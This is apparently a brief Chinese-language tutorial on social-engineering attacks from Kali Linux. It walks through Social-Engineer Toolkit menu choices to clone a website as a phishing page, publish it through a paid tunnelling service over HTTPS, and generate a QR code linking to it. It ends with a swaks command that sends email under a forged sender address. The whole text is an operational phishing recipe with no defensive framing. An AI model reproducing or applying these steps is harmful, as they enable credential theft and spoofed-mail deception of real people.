kali社会工程学攻击

使用setoolkit步骤：

1. 打开终端输入：setoolkit
2. 选择 1 - 社会工程学攻击
3. 选择 2 - 网站攻击
4. 选择 3 - 钓鱼网站攻击
5. 选择 2 - 站点克隆
6. 输入Kali IP地址
7. 输入要克隆的网站URL

内网穿透配置：

• 使用花生壳进行内网穿透
• 配置HTTPS映射（需付费6元）
• 设置内网主机IP和端口80
• 通过域名访问钓鱼网站

二维码攻击

1
2
3
4
5
6

# 使用SET生成恶意二维码
setoolkit
→ 1 社会工程学攻击
→ 8 二维码攻击
→ 输入钓鱼网站URL
生成路径: /root/.set/reports/

钓鱼邮件攻击

使用swaks工具：

1
2
3
4
5

swaks --to 目标邮箱 \
--from 伪造发件人 \
--ehlo 域名 \
--body "邮件内容" \
--header "Subject: 邮件标题"